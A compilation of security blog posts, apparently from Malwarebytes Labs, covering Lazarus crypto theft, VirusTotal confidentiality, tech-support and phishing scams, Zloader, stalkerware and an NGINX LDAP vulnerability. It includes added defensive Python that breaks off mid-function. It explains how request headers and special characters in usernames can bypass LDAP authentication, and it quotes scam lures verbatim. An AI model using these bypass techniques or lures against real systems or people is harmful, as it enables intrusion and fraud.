IT NEWS

North Korean Lazarus APT group targets blockchain tech companies

A new advisory issued by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the US Treasury Department (Treasury), highlights the cyberthreats associated with cryptocurrency thefts and tactics used by a North Korean state-sponsored advanced persistent threat (APT) group since at least 2020.

The Lazarus Group

APTs are defined as prolonged attacks on specific targets that aim to compromise their systems, and to gain information from or about them. The Lazarus Group, aka APT38, is commonly believed to be run by the North Korean government. It is thought to conduct financial cybercrimes as a way to raise money for a regime that has few trading opportunities, because of long-standing international sanctions.

These days, financial cybercrimes often involve Bitcoin and other cryptocurrencies. The CISA advisory warns that:

The US government has observed North Korean cyber actors targeting a variety of organizations in the blockchain technology and cryptocurrency industry, including cryptocurrency exchanges, decentralized finance (DeFi) protocols, play-to-earn cryptocurrency video games, cryptocurrency trading companies, venture capital funds investing in cryptocurrency, and individual holders of large amounts of cryptocurrency or valuable non-fungible tokens.

AppleJeus

Since 2018, one of the Lazarus Group’s tactics has been to disguise AppleJeus malware as cryptocurrency trading platforms for both Windows and Mac. CISA warns that it uses these trojanized applications to gain access to victims’ computers, to spread other malware, to steal private keys, or to exploit other security gaps. All of this is done to create an environment where the group can initiate fraudulent cryptocurrency transactions.

Victims are lured into downloading the malware with a variety of social engineering tactics, including spearphishing.

Spearphishing campaigns

Spearphishing is a targeted form of phishing that’s directed at and addressed to specific individuals. It uses personalization to convince victims that they are reading and responding to legitimate messages.

CISA reports that the Lazarus Group has been sending spearphishing messages to employees of cryptocurrency companies—often working in system administration or software development/IT operations (DevOps) roles—using a variety of communication platforms and social media. The messages often mimic a recruitment effort and offer high-paying jobs to entice the recipients to download “TraderTraitor” malware disguised as cryptocurrency trading or price prediction tools.

TraderTraitor describes a series of malicious Electron applications that can download and execute malicious payloads, such as remote access trojans (RATs).

Mitigation

The advisory contains a lot of specific IOCs for the most recent campaigns, but if we have learned anything from the past behavior of the Lazarus APT group it is that they will change many of them as soon as their current campaigns are outed. It is therefore important to apply the basic mitigation methods to counter this type of attack:

  • Use patch management to stay on top of those security updates!
  • Educate users on social engineering attacks like spearphishing.
  • Enforce credential requirements and use multi-factor authentication.
  • Use endpoint protection to detect exploits and stop malware.
  • Watch out for third-party downloads—especially cryptocurrency applications.
  • Create an incident response plan so you know how to respond to cyber-intrusions.

Stay safe, everyone!

The post North Korean Lazarus APT group targets blockchain tech companies appeared first on Malwarebytes Labs.

A week in security (April 11 – 17)

Last week on Malwarebytes Labs:

Stay safe!

The post A week in security (April 11 – 17) appeared first on Malwarebytes Labs.

Why you shouldn’t automate your VirusTotal uploads

It is important to realize that uploading certain files to VirusTotal may result in leaking confidential data, which could result in a breach of confidentiality, or worse.

We have warned against uploading personal information, as does VirusTotal itself on their home page. But apparently some organizations have automated the uploading of email attachments without really thinking through the possible consequences.

VirusTotal

VirusTotal is now part of Google Cloud and its goal is to help analyze suspicious files, URLs, domains, and IP addresses to detect cybersecurity threats. It does this by scanning the submitted files with the contributing anti-malware vendors’ scanning engines. Many use VirusTotal as a “second-opinion” scanner which is obviously fine to do on occasion.

VirusTotal maintains a collection of over 70 endpoint protection solutions, but it is important to realize that there is no guarantee that the version that VirusTotal relies on is the same version that you would be running, or whether it is as up to date as your version might be.

But in the context of this article it is even more important to realize that VirusTotal was not designed to check whether an attachment is malicious. It may recognize malicious attachments, especially the ones used in mass email campaigns, since those samples get uploaded more often. But in the case of a targeted attack, getting the all-clear from VirusTotal does not mean the attachment is safe to open or edit.

VirusTotal offers premium services that allow participants access to files that were uploaded by third parties. This is done to increase malware detection across the participating solutions, but also to enable threat hunting and provide a historical and current overview of the threat landscape.

Breach of confidence

In March of 2022 the German Bundesamt für Sicherheit in der Informationstechnik (BSI), which translates as the Federal Office for Security in Information Technology, warned that it had noticed the (semi-)automated upload of suspicious or quarantined email attachments. In some cases these were confidential documents, including warnings sent by the BSI marked as TLP Green and Amber.

The Traffic Light Protocol (TLP) was created in order to facilitate greater sharing of information. TLP is a set of designations used to ensure that sensitive information is shared with the appropriate audience. It employs four colors to indicate expected sharing boundaries to be applied by the recipient(s).

Uploading a document marked as TLP:GREEN, TLP:AMBER or TLP:RED is a violation of the terms and can get you removed from the list of acceptable recipients. Receiving information with a TLP tag other than TLP:WHITE is a privilege. It means that the information owners trust the recipient to respect their wishes. The recipients should do everything in their power to be worthy of that trust.
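To make the TLP point concrete, here is an added example (my own code, not from the post, the BSI or VirusTotal) of a guard an automated attachment pipeline could run before anything leaves the organisation. It looks for TLP markings in plain text and inside zip-based Office containers, blocks the submission of anything marked above TLP:WHITE, and hands back only a SHA-256 so the pipeline can fall back to a hash-only lookup instead of uploading the document. The sample attachments are constructed for the example; the marking regex and the choice to hold unmarked files for a human (absence of a marking does not prove a file is shareable) are my design decisions.

```python
"""Pre-submission guard for an automated 'scan this attachment' pipeline.

Added example for this article; not code from Malwarebytes, the BSI or
VirusTotal. It refuses to submit anything carrying a TLP marking above
TLP:WHITE and returns only a SHA-256, so the pipeline can fall back to a
hash-only lookup instead of uploading the document itself.
"""
import hashlib
import io
import re
import zipfile

# The four TLP colours named in the article; only TLP:WHITE may be shared freely.
TLP_RE = re.compile(r"\bTLP:?\s*(WHITE|GREEN|AMBER|RED)\b", re.IGNORECASE)
SHAREABLE = {"WHITE"}
MAX_MEMBER = 20 * 1024 * 1024  # skip oversized zip members (zip-bomb guard)


def _texts(data: bytes):
    """Yield text views of the file. Office documents (.docx/.xlsx/.pptx) are
    zip containers, so their members are scanned; anything else is scanned raw."""
    if data[:2] == b"PK":
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for info in zf.infolist():
                    if info.file_size > MAX_MEMBER:
                        continue
                    yield zf.read(info).decode("utf-8", errors="ignore")
            return
        except zipfile.BadZipFile:
            pass  # not really a zip: fall through to a raw scan
    yield data.decode("utf-8", errors="ignore")


def tlp_markings(data: bytes) -> set:
    """All TLP colours found anywhere in the file, upper-cased."""
    found = set()
    for text in _texts(data):
        found.update(m.group(1).upper() for m in TLP_RE.finditer(text))
    return found


def submission_decision(data: bytes) -> dict:
    """Decide what the pipeline may do with this file. A restricted marking
    blocks the upload outright; an unmarked file is held for a human, because
    the absence of a marking does not prove the document is shareable."""
    marks = tlp_markings(data)
    restricted = sorted(m for m in marks if m not in SHAREABLE)
    return {
        "sha256": hashlib.sha256(data).hexdigest(),  # usable for a hash-only lookup
        "tlp": sorted(marks),
        "restricted": restricted,
        "action": "block-hash-lookup-only" if restricted else "hold-for-review",
    }


def build_docx_like(body: str) -> bytes:
    """Constructed stand-in for a Word document: a zip with one XML member."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", f"<w:document><w:t>{body}</w:t></w:document>")
    return buf.getvalue()


# Constructed sample attachments for the example.
PLAIN_ADVISORY = b"Sample advisory\nTLP:AMBER - limited disclosure\n(details)\n"
INVOICE = b"Invoice #1234\nAmount due: 100 EUR\n"
RED_REPORT = build_docx_like("TLP:RED do not share outside the recipient organisation")

if __name__ == "__main__":
    samples = [("advisory.txt", PLAIN_ADVISORY), ("invoice.pdf", INVOICE), ("report.docx", RED_REPORT)]
    for name, blob in samples:
        print(name, submission_decision(blob))
```

The guard only sees markings that are present as text; a marking rendered as an image, or a document that is confidential without any TLP label at all (the “invoice.pdf” case from the search above), will not be caught, which is why unmarked files are held rather than passed.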

Sharing

Maybe these uploaders didn’t realize that the files are not only shared with the 70 security vendors, but are also accessible to all other businesses that use the premium services provided by VirusTotal. There are no restrictions on the location of the participating businesses, so there is no reason to assume that it is safe to upload confidential documents.

My own search on VirusTotal for “invoice.pdf” returned 17.68k results. Granted, some of these files were actually marked as malicious, but the majority had no business being available for public viewing.

Ask for permission, not forgiveness

While we do understand the occasional need to upload a file to VirusTotal, do not automate this procedure. Only use it when you have no other methods of checking whether an attachment is safe to open.

Receivers:

  • If you are in the least bit uncertain about the safety of an attachment, contact the sender and ask them about it.
  • Don’t use VirusTotal if you want to check whether an attachment is malicious. The result is not conclusive and you may breach confidentiality.
  • Never click on links in emails or email attachments.
  • Never “Enable Editing” in a document unless the sender has personally assured you it was safe.

Senders:

  • Only use attachments that could be perceived as dangerous when it’s absolutely necessary.
  • Inform recipients about the fact that you are sending them an attachment and for what reason.

There was good reason for Microsoft to disable macros by default.

Stay safe, everyone!

The post Why you shouldn’t automate your VirusTotal uploads appeared first on Malwarebytes Labs.

Filing your taxes? Be wary of help found through search engines

The deadline for filing your taxes in the US is nearly upon us. April 18 is the very last date that you can afford to hand your tax returns in to the IRS.

People will naturally gravitate toward all manner of filing tools to get the job done. But it’s worth noting that sites are lurking in search engine results to potentially make it harder to file, not easier.

Taxing times in search engine land

One such tool used to complete tax returns is TurboTax. This product requires a registration code to activate, and this is where the search engine results come into play. Some folks have issues registering or installing software for a variety of reasons. Maybe it’s hardware, perhaps it’s the software. Incompatibility frequently rears its head, and sometimes other third-party software may be interfering with installation.

Entire industries exist on forums and elsewhere to provide answers to the most obscure tech issues you can possibly imagine. While many solutions can usually be found for these issues, it pays to be cautious where search results are concerned.

Searching for install instructions

Hunting for “install Turbotax” in Yahoo, for example, brings us the following results:


It’s currently the first result after the sponsored ad and the official link. Here’s the site in question:


Hitting the “Click me” button directs visitors to the next step in the process, hosted elsewhere. It asks visitors to sign into their account, then activate their purchase and get on with sorting out their tax returns.

It’s license key time

Site users are asked to enter their 16-digit activation code.


Two things to note here. The site accepts any code of four or more digits; it does not have to be 16 digits long. There is clearly no checking taking place on the code entered. What happens if you punch in a too-short, non-existent activation key? You’re told that the activation attempt has failed, not that your code is too short.

Entering your activation code on this site means whoever runs it may now have your activation code. As a general rule of thumb, you shouldn’t give licence or registration keys for any product to anybody. Depending on the product, you may be handing a stranger your one-time-use key. When that happens, you then have the problem of figuring out how to get it back.

There are a few official support situations where informing somebody of a key’s details will be required. This isn’t one of them.

“Contact the support team…”

Help is at hand with the supposedly failed activation:


The page says:

Sorry, your code has failed to activate.

Detected issue:

  • Your activation code is stolen
  • Code expired
  • Repeated use of code
  • Your code is not generated in database
  • Or your system is virus infected

Note: Repeated failure may lead to expire code. Do not try to enter your code again and again.

Contact support team to fix this issue immediately: [number removed]

Error code: OOXOOO16FA and Correlation ID: c147654ad-41fg-ds7df-cfa9f5jhdjhsg

Keep your activation code ready while speaking to customer support

This “error code” often pops up on various forms of tech support scam, so there’s another bad sign.

What is happening in these support calls?

A colleague sent over a Reddit link detailing an example of a call in which someone handled the “support” conversation on behalf of their father, who had originally arrived on a related landing page found via a basic search:

[Image: Turbotax call]

There’s a lot to take in there in terms of not sounding particularly credible.

  1. The TurboTax code activation being interrupted due to “foreign connections on the network”
  2. The caller being connected to the person’s relative via TeamViewer with Netstat open
  3. Non-official URLs open on the desktop

These are all frequent signs of tech support scams, which often involve the installation of bogus security tools alongside additional payment. The page’s claim that the activation key failure may be down to a “virus infection”, combined with the bogus error code found on many tech support scams, makes this something to steer well clear of.

We reported both the initial landing page and the activation code page. The URL for the latter has been suspended. However, sites like these tend to use fallback URLs and webspace so it might not be gone for good.

Don’t make tax season even more taxing than it has to be

If you need help installing or activating a product, contact the relevant company directly. Don’t leave it in the hands of search engines to decide your fate. Paid results, adverts, SEO gaming, or even SEO poisoning can all cause big problems. With the tax deadline ticking down, you simply can’t afford to get into stolen key/broken computer antics this late in the process.

The post Filing your taxes? Be wary of help found through search engines appeared first on Malwarebytes Labs.

“Your AppI‌e‌ ‌l‌D‌ ‌‌h‌‌a‌‌s‌‌ ‌‌b‌‌e‌‌e‌‌n‌‌ ‌‌l‌‌ocke‌‌d‌‌” spam email takes you on a website mystery tour

Spam that claims your account has been locked out and needs to be fixed is common, and it drives people to phishing campaigns on a daily basis.

The mail below follows the same pattern with one key difference. It looks like a phish, but goes somewhere else entirely.

No, your Apple ID has not been locked

The mail claims to be from Apple, and is titled

Re: [Ticket #265763] Your Appl‌e‌ І‌D has been locke‌‌d‌‌ on [date]

It reads as follows:

Your AppI‌e‌ ‌l‌D‌ ‌‌h‌‌a‌‌s‌‌ ‌‌b‌‌e‌‌e‌‌n‌‌ ‌‌l‌‌ocke‌‌d‌‌ on [date] 2022 for ‌‌s‌‌ecurit‌‌y‌‌ ‌‌r‌‌eason‌‌s‌‌ ‌‌b‌‌ecaus‌‌e‌‌ you have ‌‌r‌‌eache‌‌d‌‌ the ‌‌m‌‌aximu‌‌m‌‌ ‌‌n‌‌umbe‌‌r‌‌ of ‌l‌n‌v‌a‌l‌i‌d‌ ‌s‌i‌g‌n‌-‌i‌n‌ ‌a‌t‌t‌e‌m‌p‌t‌s‌

You cannot ‌a‌c‌c‌e‌s‌s‌ your ‌a‌c‌c‌o‌u‌n‌t‌ and any AppI‌e‌ services

‌‌T‌‌o ‌u‌n‌l‌o‌c‌k‌ your account, ‌y‌o‌u‌’‌l‌l‌ ‌n‌e‌e‌d‌ ‌s‌o‌m‌e‌ ‌a‌d‌d‌i‌t‌i‌o‌n‌a‌l‌ ‌v‌e‌r‌i‌f‌i‌c‌a‌t‌i‌o‌n‌

For your ‌‌s‌‌ecurit‌‌y‌‌ and to ‌‌e‌‌nsur‌‌e‌‌ only you have ‌a‌c‌c‌e‌s‌s‌ to your ‌a‌c‌c‌o‌u‌n‌t‌. We will ask you to ‌v‌e‌r‌i‌f‌y‌ your ‌i‌d‌e‌n‌t‌i‌t‌y‌.

[Image: Fake Apple mail]

From phish to website spam

Clicking the big grey “verify account” button should, in theory, lead you to an Apple phishing page. However, that’s not the case here.

The link directs people to completely random domains. Some of them appear to be advertisements. Others run the full range of everything from wall cladding services and polytechnics to hotels.


There appears to be no rhyme or reason to the URLs being served up. Clicking the link could pretty much drop you anywhere without warning.


It currently leads to what appears to be a half-finished page about QR code generation.

[Image: A QR code website]

Why is this happening?

At this point, we’ve established that there’s no phish here. It’s using phishing as a panic-ruse to have you click through to multiple URLs via email campaigns. In this case, it appears someone has signed up to the below service, and is using this to spam.

Navigating to the URL included in the mail with the campaign component stripped out leads us to the below message:


Mail blasting for fun and profit

Mail spammers will try and abuse legitimate services in order to drop as many missives in your mailbox as possible. Even with countermeasures in place, they’ll slip through the net of even the most careful service provider.

Regardless of how the spam gets through, get through it will. If you provide mail marketing services, it’s important to have a reporting feature in place. The ability to tie valid registrant details to campaign URLs is also crucial.

If it’s possible to highlight in mails sent out in some way that it’s via your tool or app, so much the better.

Keeping yourself safe from mail spam

For recipients, much of the typical spam mail advice applies here:

  • Always report spam, especially if it’s going beyond the usual “please buy this t-shirt” missive. If it’s a phish, a social engineering trick of some kind, or even something malware related, block and report. It’ll help keep bad content away from others that little bit quicker.
  • If you are redirected to a phish, you’re perilously close to handing over logins to a scammer. Websites asking for details without HTTPS are a massive red flag. However, as we often point out, scammers often make use of HTTPS certificates so this is no guarantee of safety from phishing. Rather, ask yourself if you typically receive emails from Facebook or Google or anyone else asking you to visit links and enter personal details. The answer should almost certainly be no.
  • You can try the “strip out the campaign portion of the URL and see where you end up” tactic. However, you won’t know in advance if the URL on display is from a genuine marketer or just another rogue website. Search engines may assist here, but it’s a bit of a shot in the dark and potentially risky.
  • One final reminder: spammers reuse bogus mails all the time. While this one appears to redirect to random websites, the next identical message in your mailbox may well drive you to a phishing domain. Keep these fraudsters at arm’s length with a metaphorical return to sender.

We’ve reported the above mail campaign to the organisation in question and hopefully it’ll be shut down soon.

The post “Your AppI‌e‌ ‌l‌D‌ ‌‌h‌‌a‌‌s‌‌ ‌‌b‌‌e‌‌e‌‌n‌‌ ‌‌l‌‌ocke‌‌d‌‌” spam email takes you on a website mystery tour appeared first on Malwarebytes Labs.

Zloader, another botnet, bites the dust

Microsoft has announced that its Digital Crimes Unit (DCU) has taken legal and technical action to disrupt a malicious botnet called Zloader.

Zloader or Zbot are common names used to refer to any malware related to the ZeuS family. There are a lot of those because the ZeuS banking Trojan source code was leaked in 2011, and so there’s been plenty of time for several new variants to emerge.

The Zloader at hand is a botnet made up of computing devices in businesses, hospitals, schools, and homes around the world. It is run by a global, internet-based organized crime gang that operates malware as a service designed to steal and extort money.

Legal action

Microsoft obtained a court order from the United States District Court for the Northern District of Georgia, allowing it to take control of 65 domains that the Zloader gang had been using to grow, control and communicate with its botnet. These domains are now directed to a Microsoft sinkhole so they can no longer be used by the botnet operators.

A sinkhole is a way of redirecting malicious internet traffic so that it can be captured and analyzed by security professionals, and sinkholes are often used to seize control of botnets. We also saw this method used recently against the Strontium group.

Domain Generating Algorithm

Zloader has a Domain Generating Algorithm (DGA) embedded within the malware that creates additional domains as a fallback or backup communication channel for the botnet. In addition to the hardcoded domains, the court order allowed Microsoft to take control of an additional 319 currently registered DGA domains. Microsoft is working on a method to block the future registration of DGA domains.

Zloader

The primary goal of Zloader was originally financial theft, stealing account login IDs, passwords and other information to take money from people’s accounts. This makes sense, knowing the source code it started from was a banking Trojan. But Zloader also includes a component that disables popular security and antivirus software, thereby preventing victims from detecting the Zloader infection on their systems.

Over time, those behind Zloader began offering malware as a service, acting as a delivery platform to distribute ransomware such as Ryuk, DarkSide, and BlackMatter.

Zloader is a malware family known for its flexibility and the ability to evolve and change from campaign to campaign. As such, it has undergone a lot of development since its inception. The evolution has been worked on on many fronts, since several groups started working from the original ZeuS source code.

For those looking for a technical analysis of Zloader, in 2020 Malwarebytes published a report with an analysis of the “Silent Night” Zloader variant that demonstrates some of the botnet features developed for Zloader. And Microsoft provided some insight on the techniques and tactics used by this particular Zloader group.

Disruption

Microsoft worked with telecommunications providers around the world to disrupt key Zloader infrastructure. Some attempts to revive the operation are expected, but they will be monitored closely. If the method to prevent new DGA domains is successful, it will take a fresh restart to build out another botnet.

Mitigation

Given the tactics used by this Zloader group, the general rules of internet hygiene apply, starting with some that are more specific for this group:

  • Be careful with email attachments
  • Don’t click on sponsored Google results
  • Secure authentication methods
  • Patch management
  • Network segmentation
  • A backup strategy in case prevention measures fail

Stay safe, everyone!

The post Zloader, another botnet, bites the dust appeared first on Malwarebytes Labs.

Stalkerware-type detections hit record high in 2021, but fell in second half

After having tracked stalkerware for years, Malwarebytes can reveal that in 2021, detections for apps that can non-consensually monitor another person’s activity reached their highest peak ever, but that, amidst the record-setting numbers, the volume of detections actually began to significantly decrease in the second half of the year.

This decrease in stalkerware-type activity never brought detections back down to the 2019 levels that Malwarebytes recorded before the start of the global coronavirus pandemic, which was recognized in 2020 and spread quickly across the globe from February through April of that year. During 2020, the increase in physical, regional lockdowns appeared to coincide with the increase in detections of stalkerware-type apps, which Malwarebytes records as “Monitor” and “Spyware.”

Stalkerware-type activity has a documented intersection with situations of domestic abuse, and it was not the only thing that increased during the global pandemic: cases of domestic abuse, as reported by state and federal prosecutors and by shelters, rose as well.

In 2021, Malwarebytes recorded a total of 54,677 detections of Android monitor apps and 1,106 detections of Android spyware apps. This represents a 4.2 percent increase in monitor detections and a 7.2 percent increase in spyware detections year-on-year, making 2021 even worse than 2020, and the worst year for stalkerware so far.

However, although the overall numbers are up, detections have taken an unmistakable downward turn since the peak of May and June 2020.

[Chart: Monitor detections, 2020 vs 2021]
[Chart: Spyware detections, 2020 vs 2021]

In the second half of 2021, average monthly detections for monitor apps fell by 39 percent, to just 3,459 detections per month, compared to an average of 5,654 detections per month in the first half of 2021. The same trend happened with spyware too: Average monthly detections fell by 20 percent in the second half of the year compared to the first half.

What’s at play here?

When stalkerware saw its distressing uptick in 2020, Malwarebytes, in consultation with other domestic abuse support networks, hypothesized that the increased stalkerware activity came about because of the real-world physical restrictions put in place to combat COVID-19 around the world. The increase was also detected by other members of the Coalition Against Stalkerware, and coincided with news reports of increased calls to domestic abuse agencies.

In 2021, many governments loosened their coronavirus restrictions, allowing the public to mix and travel more freely. And, just as the sudden increase in stalkerware detections mirrored the sudden, mass imposition of restrictions, the gradual decline in detections appears to reflect their gradual easing.

The tidal wave of stalkerware in 2020 also led to increased awareness of the stalkerware problem, which turned into action in 2021. Last year the Federal Trade Commission issued its second-ever enforcement action against a stalkerware developer, and Google removed several ads that promoted stalkerware.

The decline in stalkerware is welcome, but the causes for it are not clear and it is too early to celebrate. It is increasingly easy for abusers to monitor their targets using off-the-shelf technology designed for other purposes. Abusers may simply have turned to other forms of technology as stalkerware became more widely detected. Or they may have returned to previous patterns of control and abuse as restrictions eased.

Thankfully, the Coalition Against Stalkerware continued to grow in 2021, increasing its contributors and accepting more expertise so as to expand its stalkerware detection threat list, which antivirus vendors can use to improve their own detection tools. As a founding member, Malwarebytes will continue to share intelligence with the Coalition Against Stalkerware to improve industry-wide detections while also guiding the domestic abuse support networks within the coalition through thorny, technical questions of detection, removal, and prevention.

You can read more interesting stats from the last year in the Malwarebytes 2022 Threat Review.

The post Stalkerware-type detections hit record high in 2021, but fell in second half appeared first on Malwarebytes Labs.

Steer clear of this “TestNTrace” SMS spam

Yesterday I received an SMS from “TestNTrace”, with the message resembling an official NHS communication:


The text reads as follows:

NHS: You’ve been in close contact with a person who has contracted the Omicron variant. Please order a test kit via: [URL redacted]

Well, that’s an alarming thing to wake up to. However, not everything is as it first seems.

Health and (security) safety concerns

The first red flag is that this isn’t an official NHS URL. Additionally, there’s no explanation as to how or why they know I’ve “been in close contact” with somebody. Nevertheless, people will take this message at face value.

Receiving this will be especially concerning for anyone with specific health risks related to COVID-19 exposure. There are also a few reasons why this kind of spam message may prove successful in the current climate.

Testing times for…tests

It’s becoming increasingly difficult to obtain PCR tests in the UK. The rules have changed, leading to frequent delays and issues. Previously you could obtain free tests as and when you needed them. Now, tests are no longer free. As per the official guidance page:

If you’re in Scotland or Northern Ireland, you might be eligible to get a free polymerase chain reaction (PCR) test to check if you have coronavirus (COVID-19).

In England or Wales you can no longer get free PCR tests to check if you have COVID-19.

There are some exemptions, but they’re few and far between.

What this means in practice is a glorious opportunity for scammers and fakers to make even more money off the back of the pandemic. Scams targeting people with coronavirus themes are bad enough at the best of times. When you can’t even get hold of a test, it’s particularly ghoulish.

Digging into the website

The landing page resembles a standard UKGOV NHS page related to the pandemic. The links also all lead to genuine NHS sites and information portals.

[Image: Ordering a test kit]

It reads as follows:

Order (COVID-19) Omicron PCR test kit

The UK has decided to deploy test kits in response to the risks of the Omicron variant. COVID-19 cases have soared by their highest number since the start of the pandemic as the Omicron variant continues to spread rapidly.

Due to rising cases among fully vaccinated patients, research has shown that it is still possible to catch and spread COVID-19 even if you are fully vaccinated.

Order your (COVID-19) Omicron PCR test kit below.

Information:

PCR tests are mandatory and failure to register could lead to movement restrictions and compulsory isolation.

Note: PCR test kits are free, you will only have to pay £0.99 for postage of the kit.

That’s a very long way of saying “please give us £0.99”. However, there’s a lot of clues in that block of text to suggest you shouldn’t give them a thing.

Of movement restrictions and compulsory isolation

“PCR tests are mandatory and failure to register could lead to movement restrictions and compulsory isolation” is quite the statement, designed to encourage people to throw money their way as fast as they can.

Confirmatory PCR tests are no longer required. You’re also no longer required by law in the UK to stay at home and isolate if infected. The Test and Trace contact service is now closed. I couldn’t even begin to tell you what the supposed movement restrictions are all about.

Clearly, we’re dealing with something here which isn’t exactly reflecting reality as it currently stands. If we proceed to the next page anyway, the site asks for a range of personal information.

Personal details, and payment for postage

The site asks for name, DOB, email, phone, and address.

[Image: A wealth of personal information]

The follow up page asks for payment details.

[Image: Payment for postage]

Avoiding the PCR payment rush

If you need to obtain test kits, your best option is likely to be local pharmacies and supermarkets. Random texts and emails which lead to sites other than nhs.uk should be treated with caution, especially when tied to requests for payment.

Even if they claim the kits are free, they’ll likely ask for postage costs. All this, on top of how they magically know you’ve come into contact with somebody who has COVID-19 in the first place. While there may well be delays and low supplies in trusted stores, it’s still a much safer option than handing your payment details and personal information to random websites.

This is one text you can happily block and report. If you need a test at short notice, answering random SMS spam is definitely not the way to get one.

The post Steer clear of this “TestNTrace” SMS spam appeared first on Malwarebytes Labs.

NGINX zero-day vulnerability: Check if you’re affected

On April 9, hacking group BlueHornet tweeted about an experimental exploit for NGINX 1.18 and promised to warn companies affected by it. On April 10, BlueHornet claimed to have breached the China branch of UBS Securities using the NGINX vulnerability.

[Image: BlueHornet tweet]

All we learned on Twitter was that a new zero-day vulnerability in the NGINX web server existed and had been publicly revealed. The vulnerability could allow remote code execution (RCE) on a vulnerable system.

But on April 11, NGINX responded with an article saying that, after investigating the issue, it had found that the vulnerability only affects reference implementations: specifically, the NGINX LDAP reference implementation, which uses LDAP to authenticate users of applications proxied by NGINX.

NGINX

NGINX is an open-source HTTP and reverse proxy server, a mail proxy server, and a generic TCP/UDP proxy server. When it was first released, NGINX was used mostly for serving static files, but since then, it has grown into a complete web server that deals with the entire spectrum of server tasks. NGINX has surpassed Apache in popularity due to its lightweight footprint and its ability to scale easily on minimal hardware. According to specialists, NGINX can run thousands of connections of static content simultaneously and is 2.5 times faster than Apache.

LDAP

Lightweight directory access protocol (LDAP) is a protocol that lets applications query user information rapidly. Companies store usernames, passwords, email addresses, printer connections, and other relatively static data in directories, and LDAP is the open, vendor-neutral application protocol for accessing and maintaining that data. LDAP also handles authentication: an application can verify a user's credentials with a bind operation against the directory, which is what lets a single directory account be used to sign in to many different applications.

The NGINX LDAP reference implementation uses LDAP to authenticate users of applications proxied by NGINX. The reference implementation was announced in June 2015. It leverages the ngx_http_auth_request_module (Auth Request) module in NGINX and NGINX Plus, which forwards authentication requests to an external service. In the reference implementation, that service is a daemon called ldap‑auth. It is written in Python and talks to an LDAP server: for each protected request, NGINX makes a subrequest to the daemon, the daemon looks the user up in the directory and binds with the supplied credentials, and its 200 or 401 response tells NGINX whether to allow or deny the original request.

[Image: NGINX and LDAP authentication flow, courtesy of NGINX]

The vulnerabilities

The primary way to configure the LDAP reference implementation is with a number of proxy_set_header directives in the NGINX configuration, which the daemon reads as X-Ldap-* request headers. The same parameters can also be set on the command line that starts the Python daemon. The vulnerabilities exist in the way unsanitized input, whether a request header the daemon was never meant to receive from a client or a crafted username, can be used to change or set LDAP configuration parameters.

The NGINX blog specifies the circumstances that need to be fulfilled for the vulnerabilities to be exploited:

  • Command-line parameters are used to configure the Python daemon
  • There are unused, optional configuration parameters
  • LDAP authentication depends on specific group membership

Mitigation

NGINX provides mitigation recommendations for each of these conditions.

When configuration parameters are specified on the command line, an attacker can override some or all of them by passing specially crafted HTTP request headers: if NGINX does not set a given X-Ldap-* header itself, it forwards whatever the client sent, and the daemon prefers a header over its command-line value. To protect against this, ensure that the corresponding configuration parameters have an empty value in the location = /auth-proxy block in the NGINX configuration. A proxy_set_header directive with an empty value makes NGINX drop any client-supplied copy of that header instead of forwarding it, so the daemon falls back to the value it was started with.

Also ensure that any unused, optional parameters have an empty value in the location = /auth-proxy block in the NGINX configuration, for the same reason: a parameter you never set is one an attacker can set for you by supplying the header.

The Python daemon does not sanitize its inputs. Consequently, an attacker can use a specially crafted request header to bypass the group membership (memberOf) check and so force LDAP authentication to succeed even if the user being authenticated does not belong to the required groups. To mitigate this, ensure that the backend daemon that presents the login form strips any special characters from the username field. In particular, it must remove the opening and closing parenthesis characters ( ) and the equal sign =, which all have special meaning for LDAP servers. The asterisk * (a wildcard in search filters) and the backslash \ (the filter escape character) deserve the same treatment.
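The two mitigations above are easier to reason about with a model of how headers and usernames actually reach the daemon. The following Python is an added example written for this article, not code from NGINX or the nginx-ldap-auth project: it models nginx's documented proxy_set_header semantics (a non-empty value replaces the client's header, an empty value removes it), a simplified version of the daemon's "header wins, otherwise command-line default" parameter lookup, and RFC 4515 escaping of the username before it is interpolated into the search-filter template. The hardened location block, the LDAP URL, DNs and group names are constructed sample values; the X-Ldap-* header names are those the reference implementation reads.

```python
"""Model of how configuration and usernames reach the ldap-auth daemon."""
import re

# Constructed sample of a hardened `location = /auth-proxy` block. Every
# X-Ldap-* value is empty so that NGINX drops any client-supplied copy of
# the header and the daemon falls back to the values it was started with.
HARDENED_AUTH_PROXY = '''
location = /auth-proxy {
    internal;
    proxy_pass http://127.0.0.1:8888;
    proxy_pass_request_body off;
    proxy_set_header Content-Length "";
    proxy_set_header X-Ldap-URL      "";
    proxy_set_header X-Ldap-Starttls "";
    proxy_set_header X-Ldap-BaseDN   "";
    proxy_set_header X-Ldap-BindDN   "";
    proxy_set_header X-Ldap-BindPass "";
    proxy_set_header X-Ldap-Template "";
    proxy_set_header X-Ldap-Realm    "";
}
'''

_SET_HEADER = re.compile(r'proxy_set_header\s+(\S+)\s+"([^"]*)"\s*;')

# daemon parameter -> request header it is read from (subset, for the model)
HEADER_FOR_PARAM = {
    "url": "X-Ldap-URL",
    "basedn": "X-Ldap-BaseDN",
    "binddn": "X-Ldap-BindDN",
    "template": "X-Ldap-Template",
}


def parse_set_headers(conf: str) -> dict:
    """Return {header name: value} for each proxy_set_header directive."""
    return dict(_SET_HEADER.findall(conf))


def forward_headers(client_headers: dict, set_headers: dict) -> dict:
    """Headers the upstream daemon receives, per nginx proxy_set_header rules.

    Client headers pass through untouched unless a directive names them;
    a non-empty directive value replaces the client's copy, and an empty
    value removes the header from the upstream request entirely.
    Names are lower-cased because HTTP header names are case-insensitive.
    """
    upstream = {name.lower(): value for name, value in client_headers.items()}
    for name, value in set_headers.items():
        if value == "":
            upstream.pop(name.lower(), None)
        else:
            upstream[name.lower()] = value
    return upstream


def resolve_params(upstream_headers: dict, cli_defaults: dict) -> dict:
    """Simplified model of the daemon: a header wins, else the CLI default."""
    return {
        param: upstream_headers.get(header.lower(), cli_defaults.get(param))
        for param, header in HEADER_FOR_PARAM.items()
    }


def escape_filter_value(value: str) -> str:
    """Escape an assertion value for an LDAP search filter (RFC 4515)."""
    return "".join(
        "\\%02x" % ord(ch) if ch in "\\*()\x00" else ch for ch in value
    )


def build_filter(template: str, username: str, sanitize: bool = True) -> str:
    """Interpolate the username into the daemon's search-filter template."""
    if sanitize:
        username = escape_filter_value(username)
    return template % {"username": username}


def demo() -> dict:
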